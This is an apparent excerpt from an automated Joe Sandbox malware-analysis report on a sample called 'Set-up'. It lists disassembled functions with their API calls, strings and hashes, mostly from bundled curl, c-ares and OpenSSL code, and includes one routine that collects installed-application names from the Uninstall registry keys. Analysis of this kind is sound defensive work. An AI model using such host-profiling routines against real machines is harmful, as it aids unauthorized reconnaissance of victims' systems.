Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 7ddbd9a136113d0e5b8e23bb2fbdae51bbb5553fbb925e9d30049bcae5dc5a24
Instruction ID: c4753846f5299542ee42968f8ef3bdaf78cf12afcf948db1c0159d1b956a190d
Opcode Fuzzy Hash: 7ddbd9a136113d0e5b8e23bb2fbdae51bbb5553fbb925e9d30049bcae5dc5a24
Instruction Fuzzy Hash: 865180B59043168FDB24DFA4D580B5EBBF0FB5A708F14452CE9449B315D730A855CF92

Function 00E8A8C0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 00E8A90C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: eaac7722d91c1c9795ef6cd7d7e5a1a14d984d28ac5c9c1a09806fb5b679ec0e
Instruction ID: 05a175b757f7d408a7671b934232bda0c514d73ec19eb99ebcc44ca313d015c2
Opcode Fuzzy Hash: eaac7722d91c1c9795ef6cd7d7e5a1a14d984d28ac5c9c1a09806fb5b679ec0e
Instruction Fuzzy Hash: B0F01D75108348AFE220AF41EC48DABBBEDEFC9768F05456DF95C232119271AE14CB72

Function 00E7A440 Relevance: 93.8, APIs: 43, Strings: 10, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00E7A499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00E7A4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00E7A531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E7AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E7AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00E7AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E7AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E7AB30
RegCloseKey.KERNELBASE(?), ref: 00E7AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00E7AB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E7ABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E7ABF0
RegCloseKey.ADVAPI32(?), ref: 00E7AC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00E7AC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00E7AC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00E7ACB4
RegCloseKey.ADVAPI32(?), ref: 00E7ACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00E7AD0A
RegEnumKeyExA.KERNELBASE ref: 00E7AD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00E7ADB0
RegCloseKey.KERNELBASE(?), ref: 00E7ADD9
RegEnumKeyExA.KERNELBASE ref: 00E7AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E7AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E7AE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 00E7AEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E7AF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00E7AF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E7AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E7AFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E7B027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00E7B03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00E7B072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 00E7B0C1

Strings

Software\Policies\Microsoft\System\DNSClient, xrefs: 00E7AC3C
[%s]:%u%%%u, xrefs: 00E7A77D
SearchList, xrefs: 00E7AA46, 00E7AA91, 00E7ABA7, 00E7ABEA, 00E7AE4E, 00E7AE9D
PrimaryDNSSuffix, xrefs: 00E7AC6B, 00E7ACAE
DhcpDomain, xrefs: 00E7B06C, 00E7B0BB
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00E7AD00
[%s]:%u, xrefs: 00E7A845
Domain, xrefs: 00E7AAE3, 00E7AB2A, 00E7AF5D, 00E7AFAC
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00E7AB78
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00E7AA0F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
API String ID: 1856363200-4239849775
Opcode ID: b903b8f81ba2929ee8cb319492105fb5ed6886d744887444f576e9014e02e339
Instruction ID: 0897e2a4f962e1810fad360c3495d77b039e975e8ec9e8308b931587250fca12
Opcode Fuzzy Hash: b903b8f81ba2929ee8cb319492105fb5ed6886d744887444f576e9014e02e339
Instruction Fuzzy Hash: 37827F71604301AFE7209F25DC85B6B7BE8EF84704F18982CF959AB2A1E774E944CB52

Function 00E89740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 00E8978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00E897BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E897E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E898A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 00E89920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E89946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E89974
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 00E89981
RegCloseKey.ADVAPI32(?), ref: 00E8998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E89992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E897FE

Part of subcall function 00E878A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,00E8E16D,?), ref: 00E878AF
Part of subcall function 00E878A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00E878D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 00E89C46

Strings

sts, xrefs: 00E899A2
\hos, xrefs: 00E8999A
CARES_HOSTS, xrefs: 00E89788
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00E8993C
DatabasePath, xrefs: 00E8996B
#, xrefs: 00E89B9D
#, xrefs: 00E89A3F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3843116398-4129964100
Opcode ID: 8e0a810c0cfafefb3d17bb5190532aec4755c919d1750cf715c05a23254ed0eb
Instruction ID: 5339e99a2f22927cb3662dd244f9a83be455e43e5faf14fc7af250f8a89a8bd0
Opcode Fuzzy Hash: 8e0a810c0cfafefb3d17bb5190532aec4755c919d1750cf715c05a23254ed0eb
Instruction Fuzzy Hash: 4C3262B5D04201ABEB11BB24AC42A6B76E8AF5431CF0C5478F94DB6263F731E914D793

Function 00DC2F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00DC2FED
RegEnumKeyExA.KERNELBASE ref: 00DC31A5

Strings

DisplayName, xrefs: 00DC30BD
app_name, xrefs: 00DC30F0
%s\%s, xrefs: 00DC3028
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00DC2F5D
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00DC2F49, 00DC2F71
d, xrefs: 00DC2FA0
installed_apps, xrefs: 00DC2F36
index, xrefs: 00DC3112

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: EnumOpen
String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
API String ID: 3231578192-3120786300
Opcode ID: fbef4f4c527e840df1030eb3f655a0920969f00253916065c2586aedbbc76536
Instruction ID: 85ac8ee43b7b8ba3895c6ca4dfdfef4201565b5b5831e8aa46faa65a0cfe0e96
Opcode Fuzzy Hash: fbef4f4c527e840df1030eb3f655a0920969f00253916065c2586aedbbc76536
Instruction Fuzzy Hash: 7171A4B4A0431A9FDB50DF69D58479EBBF0FF84318F10885DE898A7341D7749A888F92

Function 00F9E5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00F9E5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00F9E637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00F2A31E), ref: 00F9E64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00F2A31E,00000001,?,00000008,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000), ref: 00F9E665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00F2A31E,?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E), ref: 00F9E6A6
GetLastError.KERNEL32(?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00F9E6CC
GetLastError.KERNEL32(?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00F2A31E,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E6FA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: ebe86cf62661d89d49ff63efdd8d94403b88b4ea197a1905f955176e211f1f27
Instruction ID: 8cbe3f1e59dfb15daef137faa594344980cb15d2603c76060e07f526a3538601
Opcode Fuzzy Hash: ebe86cf62661d89d49ff63efdd8d94403b88b4ea197a1905f955176e211f1f27
Instruction Fuzzy Hash: 2831E672A10204BFFB30AFB1DC49F6A3769EB54726F108528F916D92D0EB30D9149B63

Function 00DF8B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00DF8C2F
WSAGetLastError.WS2_32 ref: 00DF8C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00DF8CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00DF8D0E
WSAGetLastError.WS2_32 ref: 00DF8D18
WSASetLastError.WS2_32(00000000), ref: 00DF8E0C

Strings

connected, xrefs: 00DF8DA7
not connected yet, xrefs: 00DF8BDC
connect to %s port %u from %s port %d failed: %s, xrefs: 00DF8E78
local address %s port %d..., xrefs: 00DF8C7F
cf-socket.c, xrefs: 00DF8EDF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: 1c1345b5a7529c239b6f2ea134c323569d6edb7fe7905355cd3c32b0f14ee53d
Instruction ID: 44f5c90c4a9bd6dd40caf34ea41f52f700d1eb5d9578cf62aefb67e093fca9a3
Opcode Fuzzy Hash: 1c1345b5a7529c239b6f2ea134c323569d6edb7fe7905355cd3c32b0f14ee53d
Instruction Fuzzy Hash: 2AB18E7060430A9FDB10CF24C985BB6BBA4AF44318F09C52DE9998B2D2DB71E855D772

Function 00DC76A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?), ref: 00DC76DE
send.WS2_32(multi.c,?,?,?), ref: 00DC76EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00DC7721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DC7745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC774D

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00DC7712, 00DC7731
send, xrefs: 00DC770B, 00DC772A
SEND %s:%d send(%lu) = %ld, xrefs: 00DC76F8
multi.c, xrefs: 00DC76DD, 00DC76E9

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 3540913164-3388739168
Opcode ID: 6de4d36ec0231c5e67c75c78fd34f5777754cc1871e94e5d01eda4986f838fd2
Instruction ID: cb69e4c1e32efc36cb85aa05ca7469364d717a08026341052679e0f2ab6e1c4e
Opcode Fuzzy Hash: 6de4d36ec0231c5e67c75c78fd34f5777754cc1871e94e5d01eda4986f838fd2
Instruction Fuzzy Hash: AD11E7B1A083557FD2205FA5EC4DF2B7B6CDB86B2CF04050CF80853351D6619C118BB1

Function 00F447B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F9E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E5E2
Part of subcall function 00F9E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00F9E5FA
Part of subcall function 00F9E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00F9E637
Part of subcall function 00F9E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00F2A31E), ref: 00F9E64D
Part of subcall function 00F9E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00F2A31E,00000001,?,00000008,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000), ref: 00F9E665
Part of subcall function 00F9E5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E678
Part of subcall function 00F9E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E685
Part of subcall function 00F9E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E,?,01404AB4), ref: 00F9E690
Part of subcall function 00F9E5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00F2A31E,?,?,?,?,00000000,00F447C4,?,00000000,00000000,00000000,?,00000000,?,00F2A31E), ref: 00F9E6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,01404AB4), ref: 00F447CC
GetLastError.KERNEL32(?,?,?,?,?,?,01404AB4), ref: 00F4483D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,01404AB4), ref: 00F44855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,01404AB4), ref: 00F44860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,01404AB4), ref: 00F4488E

Strings

BIO_new_file, xrefs: 00F44829, 00F44870, 00F4489D
calling fopen(%s, %s), xrefs: 00F44845
crypto/bio/bss_file.c, xrefs: 00F44830, 00F44877, 00F448A4

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
